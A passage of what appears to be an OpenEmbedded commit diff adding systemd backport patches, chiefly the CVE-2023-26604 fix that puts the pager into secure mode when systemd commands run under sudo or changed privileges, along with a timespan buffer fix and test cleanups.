+ src/test/test-time-util.c | 5 +++++
+ 2 files changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/src/basic/time-util.c b/src/basic/time-util.c
+index abbc4ad5cd70..26d59de12348 100644
+--- a/src/basic/time-util.c
++++ b/src/basic/time-util.c
+@@ -514,7 +514,7 @@ char *format_timespan(char *buf, size_t
+                         t = b;
+                 }
+ 
+-                n = MIN((size_t) k, l);
++                n = MIN((size_t) k, l-1);
+ 
+                 l -= n;
+                 p += n;
+diff --git a/src/test/test-time-util.c b/src/test/test-time-util.c
+index e8e4e2a67bb1..58c5fa9be40c 100644
+--- a/src/test/test-time-util.c
++++ b/src/test/test-time-util.c
+@@ -501,6 +501,12 @@ int main(int argc, char *argv[]) {
+         test_format_timespan(1);
+         test_format_timespan(USEC_PER_MSEC);
+         test_format_timespan(USEC_PER_SEC);
++
++        /* See issue #23928. */
++        _cleanup_free_ char *buf;
++        assert_se(buf = new(char, 5));
++        assert_se(buf == format_timespan(buf, 5, 100005, 1000));
++
+         test_timezone_is_valid();
+         test_get_timezones();
+         test_usec_add();
diff --git a/meta/recipes-core/systemd/systemd/CVE-2023-26604-1.patch b/meta/recipes-core/systemd/systemd/CVE-2023-26604-1.patch
new file mode 100644
index 0000000000..39f9480cf8
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2023-26604-1.patch
@@ -0,0 +1,115 @@
+From 612ebf6c913dd0e4197c44909cb3157f5c51a2f0 Mon Sep 17 00:00:00 2001
+From: Lennart Poettering <lennart@poettering.net>
+Date: Mon, 31 Aug 2020 19:37:13 +0200
+Subject: [PATCH] pager: set $LESSSECURE whenver we invoke a pager
+
+Some extra safety when invoked via "sudo". With this we address a
+genuine design flaw of sudo, and we shouldn't need to deal with this.
+But it's still a good idea to disable this surface given how exotic it
+is.
+
+Prompted by #5666
+
+CVE: CVE-2023-26604
+Upstream-Status: Backport [https://github.com/systemd/systemd/pull/17270/commits/612ebf6c913dd0e4197c44909cb3157f5c51a2f0]
+Comments: Hunk not refreshed
+Signed-off-by: rajmohan r <rajmohan.r@kpit.com>
+---
+ man/less-variables.xml |  9 +++++++++
+ man/systemctl.xml      |  1 +
+ man/systemd.xml        |  1 +
+ src/shared/pager.c     | 23 +++++++++++++++++++++--
+ 4 files changed, 32 insertions(+), 2 deletions(-)
+
+diff --git a/man/less-variables.xml b/man/less-variables.xml
+index 08e513c99f8e..c52511ca8e18 100644
+--- a/man/less-variables.xml
++++ b/man/less-variables.xml
+@@ -64,6 +64,15 @@
+       the invoking terminal is determined to be UTF-8 compatible).</para></listitem>
+     </varlistentry>
+ 
++    <varlistentry id='lesssecure'>
++      <term><varname>$SYSTEMD_LESSSECURE</varname></term>
++
++      <listitem><para>Takes a boolean argument. Overrides the <varname>$LESSSECURE</varname> environment
++      variable when invoking the pager, which controls the "secure" mode of less (which disables commands
++      such as <literal>|</literal> which allow to easily shell out to external command lines). By default
++      less secure mode is enabled, with this setting it may be disabled.</para></listitem>
++    </varlistentry>
++
+     <varlistentry id='colors'>
+       <term><varname>$SYSTEMD_COLORS</varname></term>
+ 
+diff --git a/man/systemctl.xml b/man/systemctl.xml
+index 1c5502883700..a3f0c3041a57 100644
+--- a/man/systemctl.xml
++++ b/man/systemctl.xml
+@@ -2240,6 +2240,7 @@ Jan 12 10:46:45 example.com bluetoothd[8900]: gatt-time-server: Input/output err
+     <xi:include href="less-variables.xml" xpointer="pager"/>
+     <xi:include href="less-variables.xml" xpointer="less"/>
+     <xi:include href="less-variables.xml" xpointer="lesscharset"/>
++    <xi:include href="less-variables.xml" xpointer="lesssecure"/>
+     <xi:include href="less-variables.xml" xpointer="colors"/>
+     <xi:include href="less-variables.xml" xpointer="urlify"/>
+   </refsect1>
+diff --git a/man/systemd.xml b/man/systemd.xml
+index a9040545c2ab..c92cfef77689 100644
+--- a/man/systemd.xml
++++ b/man/systemd.xml
+@@ -692,6 +692,7 @@
+       <xi:include href="less-variables.xml" xpointer="pager"/>
+       <xi:include href="less-variables.xml" xpointer="less"/>
+       <xi:include href="less-variables.xml" xpointer="lesscharset"/>
++      <xi:include href="less-variables.xml" xpointer="lesssecure"/>
+       <xi:include href="less-variables.xml" xpointer="colors"/>
+       <xi:include href="less-variables.xml" xpointer="urlify"/>
+ 
+diff --git a/src/shared/pager.c b/src/shared/pager.c
+index e03be6d23b2d..9c21881241f5 100644
+--- a/src/shared/pager.c
++++ b/src/shared/pager.c
+@@ -9,6 +9,7 @@
+ #include <unistd.h>
+ 
+ #include "copy.h"
++#include "env-util.h"
+ #include "fd-util.h"
+ #include "fileio.h"
+ #include "io-util.h"
+@@ -152,8 +153,7 @@ int pager_open(PagerFlags flags) {
+                         _exit(EXIT_FAILURE);
+                 }
+ 
+-                /* Initialize a good charset for less. This is
+-                 * particularly important if we output UTF-8
++                /* Initialize a good charset for less. This is particularly important if we output UTF-8
+                  * characters. */
+                 less_charset = getenv("SYSTEMD_LESSCHARSET");
+                 if (!less_charset && is_locale_utf8())
+@@ -164,6 +164,25 @@ int pager_open(PagerFlags flags) {
+                         _exit(EXIT_FAILURE);
+                 }
+ 
++                /* People might invoke us from sudo, don't needlessly allow less to be a way to shell out
++                 * privileged stuff. */
++                r = getenv_bool("SYSTEMD_LESSSECURE");
++                if (r == 0) { /* Remove env var if off */
++                        if (unsetenv("LESSSECURE") < 0) {
++                                log_error_errno(errno, "Failed to uset environment variable LESSSECURE: %m");
++                                _exit(EXIT_FAILURE);
++                        }
++                } else {
++                        /* Set env var otherwise */
++                        if (r < 0)
++                                log_warning_errno(r, "Unable to parse $SYSTEMD_LESSSECURE, ignoring: %m");
++
++                        if (setenv("LESSSECURE", "1", 1) < 0) {
++                                log_error_errno(errno, "Failed to set environment variable LESSSECURE: %m");
++                                _exit(EXIT_FAILURE);
++                        }
++                }
++
+                 if (pager_args) {
+                         r = loop_write(exe_name_pipe[1], pager_args[0], strlen(pager_args[0]) + 1, false);
+                         if (r < 0) {
diff --git a/meta/recipes-core/systemd/systemd/CVE-2023-26604-2.patch b/meta/recipes-core/systemd/systemd/CVE-2023-26604-2.patch
new file mode 100644
index 0000000000..95da7cfad6
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2023-26604-2.patch
@@ -0,0 +1,264 @@
+From 1b5b507cd2d1d7a2b053151abb548475ad9c5c3b Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Mon, 12 Oct 2020 18:57:32 +0200
+Subject: [PATCH] test-login: always test sd_pid_get_owner_uid(), modernize
+
+A long time some function only worked when in a session, and the test
+didn't execute them when sd_pid_get_session() failed. Let's always call
+them to increase coverage.
+
+While at it, let's test for ==0 not >=0 where we don't expect the function
+to return anything except 0 or error.
+
+CVE: CVE-2023-26604
+Upstream-Status: Backport [https://github.com/systemd/systemd/pull/17270/commits/1b5b507cd2d1d7a2b053151abb548475ad9c5c3b.patch]
+Comments: Hunk not refreshed
+Signed-off-by: rajmohan r <rajmohan.r@kpit.com>
+---
+ src/libsystemd/sd-login/test-login.c | 131 ++++++++++++++-------------
+ 1 file changed, 70 insertions(+), 61 deletions(-)
+
+diff --git a/src/libsystemd/sd-login/test-login.c b/src/libsystemd/sd-login/test-login.c
+index c0c77e04714b..0494fc77ba18 100644
+--- a/src/libsystemd/sd-login/test-login.c
++++ b/src/libsystemd/sd-login/test-login.c
+@@ -5,21 +5,22 @@
+ #include "sd-login.h"
+ 
+ #include "alloc-util.h"
++#include "errno-list.h"
+ #include "fd-util.h"
+ #include "format-util.h"
+ #include "log.h"
+ #include "string-util.h"
+ #include "strv.h"
+ #include "time-util.h"
+-#include "util.h"
++#include "user-util.h"
+ 
+ static char* format_uids(char **buf, uid_t* uids, int count) {
+-        int pos = 0, k, inc;
++        int pos = 0, inc;
+         size_t size = (DECIMAL_STR_MAX(uid_t) + 1) * count + 1;
+ 
+         assert_se(*buf = malloc(size));
+ 
+-        for (k = 0; k < count; k++) {
++        for (int k = 0; k < count; k++) {
+                 sprintf(*buf + pos, "%s"UID_FMT"%n", k > 0 ? " " : "", uids[k], &inc);
+                 pos += inc;
+         }
+@@ -30,6 +31,10 @@ static char* format_uids(char **buf, uid_t* uids, int count) {
+         return *buf;
+ }
+ 
++static const char *e(int r) {
++        return r == 0 ? "OK" : errno_to_name(r);
++}
++
+ static void test_login(void) {
+         _cleanup_close_pair_ int pair[2] = { -1, -1 };
+         _cleanup_free_ char *pp = NULL, *qq = NULL,
+@@ -39,65 +44,71 @@ static void test_login(void) {
+                 *seat = NULL, *session = NULL,
+                 *unit = NULL, *user_unit = NULL, *slice = NULL;
+         int r;
+-        uid_t u, u2;
+-        char *t, **seats, **sessions;
++        uid_t u, u2 = UID_INVALID;
++        char *t, **seats = NULL, **sessions = NULL;
+ 
+         r = sd_pid_get_unit(0, &unit);
+-        assert_se(r >= 0 || r == -ENODATA);
+-        log_info("sd_pid_get_unit(0, …) → \"%s\"", strna(unit));
++        log_info("sd_pid_get_unit(0, …) → %s / \"%s\"", e(r), strnull(unit));
++        assert_se(IN_SET(r, 0, -ENODATA));
+ 
+         r = sd_pid_get_user_unit(0, &user_unit);
+-        assert_se(r >= 0 || r == -ENODATA);
+-        log_info("sd_pid_get_user_unit(0, …) → \"%s\"", strna(user_unit));
++        log_info("sd_pid_get_user_unit(0, …) → %s / \"%s\"", e(r), strnull(user_unit));
++        assert_se(IN_SET(r, 0, -ENODATA));
+ 
+         r = sd_pid_get_slice(0, &slice);
+-        assert_se(r >= 0 || r == -ENODATA);
+-        log_info("sd_pid_get_slice(0, …) → \"%s\"", strna(slice));
++        log_info("sd_pid_get_slice(0, …) → %s / \"%s\"", e(r), strnull(slice));
++        assert_se(IN_SET(r, 0, -ENODATA));
++
++        r = sd_pid_get_owner_uid(0, &u2);
++        log_info("sd_pid_get_owner_uid(0, …) → %s / "UID_FMT, e(r), u2);
++        assert_se(IN_SET(r, 0, -ENODATA));
+ 
+         r = sd_pid_get_session(0, &session);
+-        if (r < 0) {
+-                log_warning_errno(r, "sd_pid_get_session(0, …): %m");
+-                if (r == -ENODATA)
+-                        log_info("Seems we are not running in a session, skipping some tests.");
+-        } else {
+-                log_info("sd_pid_get_session(0, …) → \"%s\"", session);
+-
+-                assert_se(sd_pid_get_owner_uid(0, &u2) == 0);
+-                log_info("sd_pid_get_owner_uid(0, …) → "UID_FMT, u2);
+-
+-                assert_se(sd_pid_get_cgroup(0, &cgroup) == 0);
+-                log_info("sd_pid_get_cgroup(0, …) → \"%s\"", cgroup);
+-
+-                r = sd_uid_get_display(u2, &display_session);
+-                assert_se(r >= 0 || r == -ENODATA);
+-                log_info("sd_uid_get_display("UID_FMT", …) → \"%s\"",
+-                         u2, strnull(display_session));
+-
+-                assert_se(socketpair(AF_UNIX, SOCK_STREAM, 0, pair) == 0);
+-                sd_peer_get_session(pair[0], &pp);
+-                sd_peer_get_session(pair[1], &qq);
+-                assert_se(streq_ptr(pp, qq));
+-
+-                r = sd_uid_get_sessions(u2, false, &sessions);
++        log_info("sd_pid_get_session(0, …) → %s / \"%s\"", e(r), strnull(session));
++
++        r = sd_pid_get_cgroup(0, &cgroup);
++        log_info("sd_pid_get_cgroup(0, …) → %s / \"%s\"", e(r), strnull(cgroup));
++        assert_se(r == 0);
++
++        r = sd_uid_get_display(u2, &display_session);
++        log_info("sd_uid_get_display("UID_FMT", …) → %s / \"%s\"", u2, e(r), strnull(display_session));
++        if (u2 == UID_INVALID)
++                assert_se(r == -EINVAL);
++        else
++                assert_se(IN_SET(r, 0, -ENODATA));
++
++        assert_se(socketpair(AF_UNIX, SOCK_STREAM, 0, pair) == 0);
++        sd_peer_get_session(pair[0], &pp);
++        sd_peer_get_session(pair[1], &qq);
++        assert_se(streq_ptr(pp, qq));
++
++        r = sd_uid_get_sessions(u2, false, &sessions);
++        assert_se(t = strv_join(sessions, " "));
++        log_info("sd_uid_get_sessions("UID_FMT", …) → %s \"%s\"", u2, e(r), t);
++        if (u2 == UID_INVALID)
++                assert_se(r == -EINVAL);
++        else {
+                 assert_se(r >= 0);
+                 assert_se(r == (int) strv_length(sessions));
+-                assert_se(t = strv_join(sessions, " "));
+-                strv_free(sessions);
+-                log_info("sd_uid_get_sessions("UID_FMT", …) → [%i] \"%s\"", u2, r, t);
+-                free(t);
++        }
++        sessions = strv_free(sessions);
++        free(t);
+ 
+-                assert_se(r == sd_uid_get_sessions(u2, false, NULL));
++        assert_se(r == sd_uid_get_sessions(u2, false, NULL));
+ 
+-                r = sd_uid_get_seats(u2, false, &seats);
++        r = sd_uid_get_seats(u2, false, &seats);
++        assert_se(t = strv_join(seats, " "));
++        log_info("sd_uid_get_seats("UID_FMT", …) → %s \"%s\"", u2, e(r), t);
++        if (u2 == UID_INVALID)
++                assert_se(r == -EINVAL);
++        else {
+                 assert_se(r >= 0);
+                 assert_se(r == (int) strv_length(seats));
+-                assert_se(t = strv_join(seats, " "));
+-                strv_free(seats);
+-                log_info("sd_uid_get_seats("UID_FMT", …) → [%i] \"%s\"", u2, r, t);
+-                free(t);
+-
+-                assert_se(r == sd_uid_get_seats(u2, false, NULL));
+         }
++        seats = strv_free(seats);
++        free(t);
++
++        assert_se(r == sd_uid_get_seats(u2, false, NULL));
+ 
+         if (session) {
+                 r = sd_session_is_active(session);
+@@ -109,7 +120,7 @@ static void test_login(void) {
+                 log_info("sd_session_is_remote(\"%s\") → %s", session, yes_no(r));
+ 
+                 r = sd_session_get_state(session, &state);
+-                assert_se(r >= 0);
++                assert_se(r == 0);
+                 log_info("sd_session_get_state(\"%s\") → \"%s\"", session, state);
+ 
+                 assert_se(sd_session_get_uid(session, &u) >= 0);
+@@ -123,16 +134,16 @@ static void test_login(void) {
+                 log_info("sd_session_get_class(\"%s\") → \"%s\"", session, class);
+ 
+                 r = sd_session_get_display(session, &display);
+-                assert_se(r >= 0 || r == -ENODATA);
++                assert_se(IN_SET(r, 0, -ENODATA));
+                 log_info("sd_session_get_display(\"%s\") → \"%s\"", session, strna(display));
+ 
+                 r = sd_session_get_remote_user(session, &remote_user);
+-                assert_se(r >= 0 || r == -ENODATA);
++                assert_se(IN_SET(r, 0, -ENODATA));
+                 log_info("sd_session_get_remote_user(\"%s\") → \"%s\"",
+                          session, strna(remote_user));
+ 
+                 r = sd_session_get_remote_host(session, &remote_host);
+-                assert_se(r >= 0 || r == -ENODATA);
++                assert_se(IN_SET(r, 0, -ENODATA));
+                 log_info("sd_session_get_remote_host(\"%s\") → \"%s\"",
+                          session, strna(remote_host));
+ 
+@@ -161,7 +172,7 @@ static void test_login(void) {
+                         assert_se(r == -ENODATA);
+                 }
+ 
+-                assert_se(sd_uid_get_state(u, &state2) >= 0);
++                assert_se(sd_uid_get_state(u, &state2) == 0);
+                 log_info("sd_uid_get_state("UID_FMT", …) → %s", u, state2);
+         }
+ 
+@@ -173,11 +184,11 @@ static void test_login(void) {
+                 assert_se(sd_uid_is_on_seat(u, 0, seat) > 0);
+ 
+                 r = sd_seat_get_active(seat, &session2, &u2);
+-                assert_se(r >= 0);
++                assert_se(r == 0);
+                 log_info("sd_seat_get_active(\"%s\", …) → \"%s\", "UID_FMT, seat, session2, u2);
+ 
+                 r = sd_uid_is_on_seat(u, 1, seat);
+-                assert_se(r >= 0);
++                assert_se(IN_SET(r, 0, 1));
+                 assert_se(!!r == streq(session, session2));
+ 
+                 r = sd_seat_get_sessions(seat, &sessions, &uids, &n);
+@@ -185,8 +196,8 @@ static void test_login(void) {
+                 assert_se(r == (int) strv_length(sessions));
+                 assert_se(t = strv_join(sessions, " "));
+                 strv_free(sessions);
+-                log_info("sd_seat_get_sessions(\"%s\", …) → %i, \"%s\", [%i] {%s}",
+-                         seat, r, t, n, format_uids(&buf, uids, n));
++                log_info("sd_seat_get_sessions(\"%s\", …) → %s, \"%s\", [%u] {%s}",
++                         seat, e(r), t, n, format_uids(&buf, uids, n));
+                 free(t);
+ 
+                 assert_se(sd_seat_get_sessions(seat, NULL, NULL, NULL) == r);
+@@ -204,7 +215,7 @@ static void test_login(void) {
+ 
+         r = sd_seat_get_active(NULL, &t, NULL);
+         assert_se(IN_SET(r, 0, -ENODATA));
+-        log_info("sd_seat_get_active(NULL, …) (active session on current seat) → %s", strnull(t));
++        log_info("sd_seat_get_active(NULL, …) (active session on current seat) → %s / \"%s\"", e(r), strnull(t));
+         free(t);
+ 
+         r = sd_get_sessions(&sessions);
+@@ -244,13 +255,11 @@ static void test_login(void) {
+ 
+ static void test_monitor(void) {
+         sd_login_monitor *m = NULL;
+-        unsigned n;
+         int r;
+ 
+-        r = sd_login_monitor_new("session", &m);
+-        assert_se(r >= 0);
++        assert_se(sd_login_monitor_new("session", &m) == 0);
+ 
+-        for (n = 0; n < 5; n++) {
++        for (unsigned n = 0; n < 5; n++) {
+                 struct pollfd pollfd = {};
+                 usec_t timeout, nw;
diff --git a/meta/recipes-core/systemd/systemd/CVE-2023-26604-3.patch b/meta/recipes-core/systemd/systemd/CVE-2023-26604-3.patch
new file mode 100644
index 0000000000..f02f62b772
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2023-26604-3.patch
@@ -0,0 +1,182 @@
+From 0a42426d797406b4b01a0d9c13bb759c2629d108 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Wed, 7 Oct 2020 11:15:05 +0200
+Subject: [PATCH] pager: make pager secure when under euid is changed or
+ explicitly requested
+
+The variable is renamed to SYSTEMD_PAGERSECURE (because it's not just about
+less now), and we automatically enable secure mode in certain cases, but not
+otherwise.
+
+This approach is more nuanced, but should provide a better experience for
+users:
+
+- Previusly we would set LESSSECURE=1 and trust the pager to make use of
+  it. But this has an effect only on less. We need to not start pagers which
+  are insecure when in secure mode. In particular more is like that and is a
+  very popular pager.
+
+- We don't enable secure mode always, which means that those other pagers can
+  reasonably used.
+
+- We do the right thing by default, but the user has ultimate control by
+  setting SYSTEMD_PAGERSECURE.
+
+Fixes #5666.
+
+v2:
+- also check $PKEXEC_UID
+
+v3:
+- use 'sd_pid_get_owner_uid() != geteuid()' as the condition
+
+CVE: CVE-2023-26604
+Upstream-Status: Backport [https://github.com/systemd/systemd/pull/17270/commits/0a42426d797406b4b01a0d9c13bb759c2629d108]
+Comments: Hunk refreshed
+Signed-off-by: rajmohan r <rajmohan.r@kpit.com>
+---
+ man/less-variables.xml | 30 +++++++++++++++----
+ src/shared/pager.c     | 63 ++++++++++++++++++++++++++-------------
+ 2 files changed, 66 insertions(+), 27 deletions(-)
+
+diff --git a/man/less-variables.xml b/man/less-variables.xml
+index c52511c..049e9f7 100644
+--- a/man/less-variables.xml
++++ b/man/less-variables.xml
+@@ -65,12 +65,30 @@
+     </varlistentry>
+ 
+     <varlistentry id='lesssecure'>
+-      <term><varname>$SYSTEMD_LESSSECURE</varname></term>
+-
+-      <listitem><para>Takes a boolean argument. Overrides the <varname>$LESSSECURE</varname> environment
+-      variable when invoking the pager, which controls the "secure" mode of less (which disables commands
+-      such as <literal>|</literal> which allow to easily shell out to external command lines). By default
+-      less secure mode is enabled, with this setting it may be disabled.</para></listitem>
++      <term><varname>$SYSTEMD_PAGERSECURE</varname></term>
++
++      <listitem><para>Takes a boolean argument. When true, the "secure" mode of the pager is enabled; if
++      false, disabled. If <varname>$SYSTEMD_PAGERSECURE</varname> is not set at all, secure mode is enabled
++      if the effective UID is not the same as the owner of the login session, see <citerefentry
++      project='man-pages'><refentrytitle>geteuid</refentrytitle><manvolnum>2</manvolnum></citerefentry> and
++      <citerefentry><refentrytitle>sd_pid_get_owner_uid</refentrytitle><manvolnum>3</manvolnum></citerefentry>.
++      In secure mode, <option>LESSSECURE=1</option> will be set when invoking the pager, and the pager shall
++      disable commands that open or create new files or start new subprocesses. When
++      <varname>$SYSTEMD_PAGERSECURE</varname> is not set at all, pagers which are not known to implement
++      secure mode will not be used. (Currently only
++      <citerefentry><refentrytitle>less</refentrytitle><manvolnum>1</manvolnum></citerefentry> implements
++      secure mode.)</para>
++
++      <para>Note: when commands are invoked with elevated privileges, for example under <citerefentry
++      project='man-pages'><refentrytitle>sudo</refentrytitle><manvolnum>8</manvolnum></citerefentry> or
++      <citerefentry
++      project='die-net'><refentrytitle>pkexec</refentrytitle><manvolnum>1</manvolnum></citerefentry>, care
++      must be taken to ensure that unintended interactive features are not enabled. "Secure" mode for the
++      pager may be enabled automatically as describe above. Setting <varname>SYSTEMD_PAGERSECURE=0</varname>
++      or not removing it from the inherited environment allows the user to invoke arbitrary commands. Note
++      that if the <varname>$SYSTEMD_PAGER</varname> or <varname>$PAGER</varname> variables are to be
++      honoured, <varname>$SYSTEMD_PAGERSECURE</varname> must be set too. It might be reasonable to completly
++      disable the pager using <option>--no-pager</option> instead.</para></listitem>
+     </varlistentry>
+ 
+     <varlistentry id='colors'>
+diff --git a/src/shared/pager.c b/src/shared/pager.c
+index a3b6576..a72d9ea 100644
+--- a/src/shared/pager.c
++++ b/src/shared/pager.c
+@@ -8,6 +8,8 @@
+ #include <sys/prctl.h>
+ #include <unistd.h>
+ 
++#include "sd-login.h"
++
+ #include "copy.h"
+ #include "env-util.h"
+ #include "fd-util.h"
+@@ -164,25 +166,42 @@ int pager_open(PagerFlags flags) {
+                 }
+ 
+                 /* People might invoke us from sudo, don't needlessly allow less to be a way to shell out
+-                 * privileged stuff. */
+-                r = getenv_bool("SYSTEMD_LESSSECURE");
+-                if (r == 0) { /* Remove env var if off */
+-                        if (unsetenv("LESSSECURE") < 0) {
+-                                log_error_errno(errno, "Failed to uset environment variable LESSSECURE: %m");
+-                                _exit(EXIT_FAILURE);
+-                        }
+-                } else {
+-                        /* Set env var otherwise */
++                 * privileged stuff. If the user set $SYSTEMD_PAGERSECURE, trust their configuration of the
++                 * pager. If they didn't, use secure mode when under euid is changed. If $SYSTEMD_PAGERSECURE
++                 * wasn't explicitly set, and we autodetect the need for secure mode, only use the pager we
++                 * know to be good. */
++                int use_secure_mode = getenv_bool("SYSTEMD_PAGERSECURE");
++                bool trust_pager = use_secure_mode >= 0;
++                if (use_secure_mode == -ENXIO) {
++                        uid_t uid;
++
++                        r = sd_pid_get_owner_uid(0, &uid);
+                         if (r < 0)
+-                                log_warning_errno(r, "Unable to parse $SYSTEMD_LESSSECURE, ignoring: %m");
++                                log_debug_errno(r, "sd_pid_get_owner_uid() failed, enabling pager secure mode: %m");
+ 
+-                        if (setenv("LESSSECURE", "1", 1) < 0) {
+-                                log_error_errno(errno, "Failed to set environment variable LESSSECURE: %m");
+-                                _exit(EXIT_FAILURE);
+-                        }
++                        use_secure_mode = r < 0 || uid != geteuid();
++
++                } else if (use_secure_mode < 0) {
++                        log_warning_errno(use_secure_mode, "Unable to parse $SYSTEMD_PAGERSECURE, assuming true: %m");
++                        use_secure_mode = true;
+                 }
+ 
+-                if (pager_args) {
++                /* We generally always set variables used by less, even if we end up using a different pager.
++                 * They shouldn't hurt in any case, and ideally other pagers would look at them too. */
++                if (use_secure_mode)
++                        r = setenv("LESSSECURE", "1", 1);
++                else
++                        r = unsetenv("LESSSECURE");
++                if (r < 0) {
++                        log_error_errno(errno, "Failed to adjust environment variable LESSSECURE: %m");
++                        _exit(EXIT_FAILURE);
++                }
++
++                if (trust_pager && pager_args) { /* The pager config might be set globally, and we cannot
++                                                  * know if the user adjusted it to be appropriate for the
++                                                  * secure mode. Thus, start the pager specified through
++                                                  * envvars only when $SYSTEMD_PAGERSECURE was explicitly set
++                                                  * as well. */
+                         r = loop_write(exe_name_pipe[1], pager_args[0], strlen(pager_args[0]) + 1, false);
+                         if (r < 0) {
+                                 log_error_errno(r, "Failed to write pager name to socket: %m");
+@@ -194,13 +213,14 @@ int pager_open(PagerFlags flags) {
+                                        "Failed to execute '%s', using fallback pagers: %m", pager_args[0]);
+                 }
+ 
+-                /* Debian's alternatives command for pagers is
+-                 * called 'pager'. Note that we do not call
+-                 * sensible-pagers here, since that is just a
+-                 * shell script that implements a logic that
+-                 * is similar to this one anyway, but is
+-                 * Debian-specific. */
++                /* Debian's alternatives command for pagers is called 'pager'. Note that we do not call
++                 * sensible-pagers here, since that is just a shell script that implements a logic that is
++                 * similar to this one anyway, but is Debian-specific. */
+                 FOREACH_STRING(exe, "pager", "less", "more") {
++                        /* Only less implements secure mode right now. */
++                        if (use_secure_mode && !streq(exe, "less"))
++                                continue;
++
+                         r = loop_write(exe_name_pipe[1], exe, strlen(exe) + 1, false);
+                         if (r  < 0) {
+                                 log_error_errno(r, "Failed to write pager name to socket: %m");
+@@ -211,6 +231,7 @@ int pager_open(PagerFlags flags) {
+                                        "Failed to execute '%s', using next fallback pager: %m", exe);
+                 }
+ 
++                /* Our builtin is also very secure. */
+                 r = loop_write(exe_name_pipe[1], "(built-in)", strlen("(built-in)") + 1, false);
+                 if (r < 0) {
+                         log_error_errno(r, "Failed to write pager name to socket: %m");
diff --git a/meta/recipes-core/systemd/systemd/CVE-2023-26604-4.patch b/meta/recipes-core/systemd/systemd/CVE-2023-26604-4.patch
new file mode 100644
index 0000000000..bc6b0a91c2
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2023-26604-4.patch
@@ -0,0 +1,32 @@
+From b8f736b30e20a2b44e7c34bb4e43b0d97ae77e3c Mon Sep 17 00:00:00 2001
+From: Lennart Poettering <lennart@poettering.net>
+Date: Thu, 15 Oct 2020 10:54:48 +0200
+Subject: [PATCH] pager: lets check SYSTEMD_PAGERSECURE with secure_getenv()
+
+I can't think of any real vulnerability about this, but it still feels
+better to check a variable with "secure" in its name with
+secure_getenv() rather than plain getenv().
+
+Paranoia FTW!
+
+CVE: CVE-2023-26604
+Upstream-Status: Backport [https://github.com/systemd/systemd/pull/17359/commits/b8f736b30e20a2b44e7c34bb4e43b0d97ae77e3c]
+Comments: Hunk refreshed
+Signed-off-by: rajmohan r <rajmohan.r@kpit.com>
+---
+ src/shared/pager.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/shared/pager.c b/src/shared/pager.c
+index a72d9ea..250519c 100644
+--- a/src/shared/pager.c
++++ b/src/shared/pager.c
+@@ -170,7 +170,7 @@ int pager_open(PagerFlags flags) {
+                  * pager. If they didn't, use secure mode when under euid is changed. If $SYSTEMD_PAGERSECURE
+                  * wasn't explicitly set, and we autodetect the need for secure mode, only use the pager we
+                  * know to be good. */
+-                int use_secure_mode = getenv_bool("SYSTEMD_PAGERSECURE");
++                int use_secure_mode = getenv_bool_secure("SYSTEMD_PAGERSECURE");
+                 bool trust_pager = use_secure_mode >= 0;
+                 if (use_secure_mode == -ENXIO) {
+                         uid_t uid;
diff --git a/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch b/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch
new file mode 100644
index 0000000000..86d9b0499a
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch
@@ -0,0 +1,78 @@
+From 1f25c71d9d0b5fe6cf383c347dcebc2443a99fe1 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Tue, 1 Sep 2020 12:42:35 +0200
+Subject: [PATCH] basic: pass allocation info for ordered_set_new() and
+ introduce ordered_set_ensure_put()
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/1f25c71d9d0b5fe6cf383c347dcebc2443a99fe1]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/basic/ordered-set.c | 21 +++++++++++++++++++++
+ src/basic/ordered-set.h | 18 +++++++-----------
+ 2 files changed, 28 insertions(+), 11 deletions(-)
+
+diff --git a/src/basic/ordered-set.c b/src/basic/ordered-set.c
+index 7fdb47e064..fb82c17b5a 100644
+--- a/src/basic/ordered-set.c
++++ b/src/basic/ordered-set.c
+@@ -4,6 +4,27 @@
+ #include "ordered-set.h"
+ #include "strv.h"
+ 
++int _ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops  HASHMAP_DEBUG_PARAMS) {
++        if (*s)
++                return 0;
++
++        *s = _ordered_set_new(ops  HASHMAP_DEBUG_PASS_ARGS);
++        if (!*s)
++                return -ENOMEM;
++
++        return 0;
++}
++
++int _ordered_set_ensure_put(OrderedSet **s, const struct hash_ops *ops, void *p  HASHMAP_DEBUG_PARAMS) {
++        int r;
++
++        r = _ordered_set_ensure_allocated(s, ops  HASHMAP_DEBUG_PASS_ARGS);
++        if (r < 0)
++                return r;
++
++        return ordered_set_put(*s, p);
++}
++
+ int ordered_set_consume(OrderedSet *s, void *p) {
+         int r;
+ 
+diff --git a/src/basic/ordered-set.h b/src/basic/ordered-set.h
+index a42a57eb49..2c241a808b 100644
+--- a/src/basic/ordered-set.h
++++ b/src/basic/ordered-set.h
+@@ -7,20 +7,16 @@
+ 
+ typedef struct OrderedSet OrderedSet;
+ 
+-static inline OrderedSet* ordered_set_new(const struct hash_ops *ops) {
+-        return (OrderedSet*) ordered_hashmap_new(ops);
++static inline OrderedSet* _ordered_set_new(const struct hash_ops *ops  HASHMAP_DEBUG_PARAMS) {
++        return (OrderedSet*) internal_ordered_hashmap_new(ops  HASHMAP_DEBUG_PASS_ARGS);
+ }
++#define ordered_set_new(ops) _ordered_set_new(ops  HASHMAP_DEBUG_SRC_ARGS)
+ 
+-static inline int ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops) {
+-        if (*s)
+-                return 0;
